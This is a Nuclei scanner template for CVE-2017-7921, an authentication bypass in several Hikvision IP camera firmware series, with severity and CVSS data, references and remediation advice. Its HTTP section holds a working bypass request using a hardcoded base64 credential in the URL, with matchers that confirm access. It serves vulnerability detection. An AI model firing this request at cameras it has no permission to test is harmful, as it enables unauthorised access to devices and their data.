nuclei-templates/http/cves/2017/CVE-2017-7921.yaml

45 lines
1.9 KiB
YAML
Raw Normal View History

2021-04-07 17:00:37 +00:00
id: CVE-2017-7921
2021-04-07 17:00:37 +00:00
info:
name: Hikvision - Authentication Bypass
2021-04-07 17:00:37 +00:00
author: princechaddha
severity: critical
description: Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices contain an improper authentication issue. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.
2023-09-06 13:22:34 +00:00
remediation: |
Apply the latest firmware update provided by Hikvision to fix the authentication bypass vulnerability.
reference:
2021-04-18 13:00:27 +00:00
- http://www.hikvision.com/us/about_10805.html
- https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01
- https://nvd.nist.gov/vuln/detail/CVE-2017-7921
2023-07-11 19:49:27 +00:00
- https://ghostbin.com/paste/q2vq2
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2017-7921
cwe-id: CWE-287
2023-07-11 19:49:27 +00:00
epss-score: 0.01169
2023-08-31 11:46:18 +00:00
epss-percentile: 0.83195
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:o:hikvision:ds-2cd2032-i_firmware:-:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: hikvision
product: ds-2cd2032-i_firmware
tags: cve,cve2017,auth-bypass,hikvision
2021-04-07 17:00:37 +00:00
http:
2021-04-07 17:00:37 +00:00
- method: GET
path:
- "{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK"
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: body
2021-04-07 17:00:37 +00:00
words:
- "<firmwareVersion>"
- type: word
2023-07-11 19:49:27 +00:00
part: header
2021-04-07 17:00:37 +00:00
words:
- "application/xml"